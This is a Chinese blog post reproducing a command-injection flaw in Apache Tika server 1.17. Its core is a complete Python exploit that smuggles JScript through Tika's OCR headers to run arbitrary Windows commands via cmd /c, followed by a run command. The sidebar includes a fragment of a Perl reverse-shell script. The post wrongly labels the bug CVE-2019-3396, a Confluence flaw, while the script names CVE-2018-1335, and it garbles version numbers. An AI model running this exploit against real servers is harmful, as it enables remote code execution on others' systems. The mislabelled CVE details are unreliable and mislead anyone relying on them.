Apache Tika 命令注入(CVE-2019-3396)

最新推荐文章于 2024-06-13 09:52:26 发布
置顶 最新推荐文章于 2024-06-13 09:52:26 发布
阅读量892 收藏
点赞数
分类专栏: 渗透测试 文章标签: Apache Tika 命令注入(CVE-2019-3396)
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36369941/article/details/99698765
版权

title: Apache Tika 命令注入(CVE-2019-3396)
tags: [poc,cve]

简介

Apache Tika 工具集可以检测和提取上千种不同文件类型(比如PPT,XLS,PDF等)中的元数据和文本。所有的这些类型文件都可以通过一个单独的接口实现解析,这使Tika对搜索引擎的索引,目录分析和翻译等很有帮助。(https://tika.apache.org/)

影响范围

1.17版本

漏洞成因

此漏洞由tika-server部分代码造成。对tika-server 1.1.7和1.1.8版本的源代码目录执行并行递归diff处理,一次只返回一个发生修改的文件。

修复方法

升级到最新版本的Apache Tike

环境搭建

在Windows 10中安装Apache Tike

(1).下载Apache Tike
https://archive.apache.org/dist/tika/tika-server-1.17.jar
(2).运行环境
java -jar tika-server-1.17.jar
(3).在浏览器中打开Apache Tike页面
http://localhost:9998/或http://127.0.0.1:9998(不能使用IP:port方式访问)

在这里插入图片描述

漏洞复现

1.使用以下payload


import sys
import requests
 
if len(sys.argv) < 4:
        print("Usage: python CVE-2018-1335.py <host> <port> <command>")
        print("Example: python CVE-2018-1335.py localhost 9998 calc.exe")
else:
        host = sys.argv[1]
        port = sys.argv[2]
        cmd = sys.argv[3]
 
        url = host+":"+str(port)+"/meta"
 
        headers = {"X-Tika-OCRTesseractPath": "\"cscript\"", 
                "X-Tika-OCRLanguage": "//E:Jscript", 
                "Expect": "100-continue", 
                "Content-type": "image/jp2", 
                "Connection": "close"}
 
        jscript='''var oShell = WScript.CreateObject("WScript.Shell");
        var oExec = oShell.Exec('cmd /c {}');
        '''.format(cmd)
 
        try:
                requests.put("https://"+url, headers=headers, data=jscript, verify=False)
         
        except:
                try:
                        requests.put("http://"+url, headers=headers, data=jscript)
                except:
                        print("Something went wrong.\nUsage: python CVE-2018-1335.py <host> <port> <command>")

将以上payload复制保存为python文件。

2.运行攻击
使用以下命令

python CVE-2018-1335.py localhost 9998 "mspaint | notepad"

在这里插入图片描述

3.之后就会弹出图画和记事本,说明命令注入成功。还可以通过修改命令达到其他的目的。
在这里插入图片描述

#参考链接:

  • https://github.com/RhinoSecurityLabs/CVEs/tree/master/CVE-2018-1335
  • https://xz.aliyun.com/t/4452
  • https://blog.csdn.net/u010051887/article/details/88665398
淡淡的就好_
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Atlassian Confluence 路径穿越与命令执行漏洞(CVE-2019-3396)
谢公子的博客
01-31 1599
Confluence Confluence是Atlassian公司开发的一个专业的企业知识管理与协同软件,也可以用于构建企业wiki。使用简单,但它强大的编辑和站点管理特征能够帮助团队成员之间共享信息、文档协作、集体讨论,信息推送。Confluence为团队提供一个协作环境。在这里,团队成员齐心协力,各擅其能,协同地编写文档和管理项目。从此打破不同团队、不同部门以及个人之间信息孤岛的僵局,Confluence真正实现了组织资源共享。Confluence 已经在超过100个国家,13500个组织中成功地应用
tika-python绑定到 Apache Tika REST 服务
05-27
tika-python 绑定到 Apache Tika REST 服务 Python binding to the Apache Tika REST services Apache Tika 库的 Python 端口,可使用 Tika REST 服务器使 Tika 可用。这使得 Apache Tika 可作为 Python 库使用,可...
修改jar 注入_Apache Tika命令注入漏洞挖掘
weixin_39846664的博客
11-20 242
介绍这篇文章将从一个Apache tika服务器的命令注入漏洞到完全利用的步骤。CVE是https://nvd.nist.gov/vuln/detail/CVE-2018-1335。由于Apache Tika是开源的,我能够通过分析Apache Tika代码来确定问题。虽然命令注入漏洞通常很简单,但要实现完整的远程代码或命令执行需要克服一些障碍。这是由于Java处理执行操作系统命令的方式...
探索与征服:CVE-2019-3396—解锁Confluence安全新纪元
最新发布
gitblog_00068的博客
06-13 410
探索与征服:CVE-2019-3396—解锁Confluence安全新纪元 项目地址:https://gitcode.com/jas502n/CVE-2019-3396 在信息安全的世界里,每一次漏洞的发现都是一次技术与智慧的碰撞。今天,我们将聚焦于一个特别的开源项目——针对Atlassian Confluence的RCE(远程代码执行)漏洞CVE-2019-3396。本文旨在深度剖析这一项目的重...
Apache Tika-server 命令执行漏洞(CVE-2018-1335)
weixin_44047654的博客
04-12 579
Apache Tika-server 命令执行漏洞(CVE-2018-1335)
CVE-2019-3396 实战反弹shell
weixin_45439698的博客
07-22 2835
前言 距离4月4日Confluence官方发布远程命令执行高危漏洞的安全更新距今已快一周的时间。在网上也陆续爆出了一系列的POC,但是这些POC仅局限于测试是否存在漏洞,或者就是只是命令执行,并不能进行shell的反弹,如果不能反弹shell,那要这洞有何用。 于是我花了一下午的时间去进行测试,才有了这篇利用该漏洞进行实战反弹shell的文章。 准备 鉴于网上已有一系列的分析文章,这里我也不做漏洞...
反弹shell
weixin_33921089的博客
01-05 57
#!/usr/bin/perl -w # use strict; use Socket; use I:Handle; if($#ARGV+1 != 2){ print “$#ARGV $0 Remote_IP Remote_Port \n”; exit 1; }...
apache-tika-1.0-src.zip
12-10
这个"apache-tika-1.0-src.zip"文件是Tika 1.0版本的源代码包,对于深入理解Tika的工作原理和自定义扩展非常有帮助。 Tika的核心组件包括解析器(Parsers)、元数据(Metadata)和探测器(Detectors)。解析器负责...
apache-tika-1.2-src.zip_ tika-app-1.2_java poi word_tika-app-1.2
09-14
在"apache-tika-1.2-src.zip"这个压缩包中,你将找到Tika的源代码,这对于理解其工作原理和进行自定义扩展非常有帮助。"tika-app-1.2"是Tika的可执行JAR文件,它集成了所有必需的依赖项,可以直接运行,用于处理和...
ForeIndex:使用Apache Hadoop,Apache Lucene和Apache Tika的分布式索引-开源
04-26
这是一个分布式索引框架,使用Apache Hadoop,Apache Lucene和Apache Tika对大量数据进行索引。
apache-tika-0.1-incubating-src.tar.gz_垂直搜索引擎
09-21
"apache-tika-0.1-incubating-src.tar.gz"是Apache Tika项目的早期版本源代码包,发布于其在Apache孵化器期间。这个版本可能包含了一些基础功能和初步的框架,为后续版本的发展打下了基础。 Tika的主要功能包括: ...
elastika:使用 Apache Tika 提取数据并将它们发送到 Elasticseach 的命令行实用程序
06-04
弹性纤维 提取 Apache Tika 支持的文件的元数据和纯文本内容并将它们发送到服务器的命令行实用程序。 发布 用法 下载后,将其放在libs/文件夹中的tika-app.jar文件放在包含elastika.jar的同一文件夹中。 现在,您已准备好使用 Elastika。 注意:本文档假设最终用户至少在 localhost 或某些主机上安装并运行了 ,您可以使用以下选项指定这些主机。 选项: usage: elastika -i,--indice <arg> (Required) Elastic indice name. -t,--type <arg> (Required) Elastic indice type name. -f,--file <arg> (Required) The document to be parsed and sent to
深入了解SQL注入绕过waf和过滤机制
05-04
知己知彼百战不殆 --孙子兵法 [目录] 0x00 前言 0x01 WAF的常见特征 0x02 绕过WAF的方法 0x03 SQLi Filter的实现及Evasion 0x04 延伸及测试向量示例 0x05 本文小结 0x06 参考资料
confluence rce ssti CVE-2019-3396
weixin_30810239的博客
04-10 132
安全圈有一个非常有趣的现象,那就是朋友圈没人发 没一个人发 那这个就没什么人关注 CVE-2019-3396 这个出来2个礼拜了 有人开始刷Twitter看到分析文章了才到朋友圈 然后朋友圈才有人开始分析,然后乙方看到有同行分析了才分析然后发通告。 interesting!!!! ^^ https://paper.seebug.org/884/分析文章还是转国内的吧 可...
(转)Confluence 未授权 RCE (CVE-2019-3396) 漏洞分析
葡萄城技术团队博客
04-16 1873
看到官方发布了预警,于是开始了漏洞应急。漏洞描述中指出Confluence Server与Confluence Data Center中的Widget Connector存在服务端模板注入漏洞,攻击者能利用此漏洞能够实现目录穿越与远程代码执行。 确认漏洞点是Widget Connector,下载最新版的比对补丁,发现在com\atlassian\confluence\extra\widget...
CVE-2019-3396 Confluence RCE漏洞简单粗暴复现
qq_42886216的博客
09-29 1235
CVE-2019-3396 Confluence RCE漏洞简单粗暴复现 1,前言 网上也有很多关于该漏洞的说明和复现,不再做过多阐述,在复现该漏洞时踩了一些坑,然后发现了一个快速复现的方法,所以本篇文章介绍的是如何简单快速地复现该漏洞。 2.漏洞复现过程简述 (1)rm文件 需求:需要远程包含一个后缀是.rm的文件,文件内容如下 #set ($e="exp") #set ($a=$e.getClass().forName("java.lang.Runtime").getMethod("getRuntime
CVE漏洞复现-CVE-2020-16846SaltStack命令注入
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
04-07 796
SaltStack 是基于 Python 开发的一套C/S架构配置管理工具。2020年11月SaltStack官方披露了CVE-2020-16846,CVE-2020-16846允许用户执行任意命令
Confluence 未授权 RCE (CVE-2019-3396) 漏洞分析
weixin_34345753的博客
04-10 429
作者:Badcode@知道创宇404实验室时间:2019年4月8日 看到官方发布了预警,于是开始了漏洞应急。漏洞描述中指出Confluence Server与Confluence Data Center中的Widget Connector存在服务端模板注入漏洞,***者能利用此漏洞能够实现目录穿越与远程代码执行。 确认漏洞点是Widget Connector,下载最新版的比对补丁,发现在com\a...
Apache Tika-server RCE(CVE-2018-1335)
公众号shadow sock7
03-13 1164
PoC:https://github.com/RhinoSecurityLabs/CVEs/tree/master/CVE-2018-1335 PUT /meta HTTP/1.1 Host: cqq.com:9998 Connection: close User-Agent: python-requests/2.19.1 X-Tika-OCRTesseractPath: &amp;amp;quot;cscript&amp;amp;quot; Co...
java -jar tika-app.jar --text
02-06
通过运行java -jar tika-app.jar --text命令,可以使用Tika工具来提取文档中的文本内容。Tika是一个用于提取文档内容的开源工具,可以处理各种类型的文档,例如PDF、Word、Excel等。当我们在命令行中输入这条命令时...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值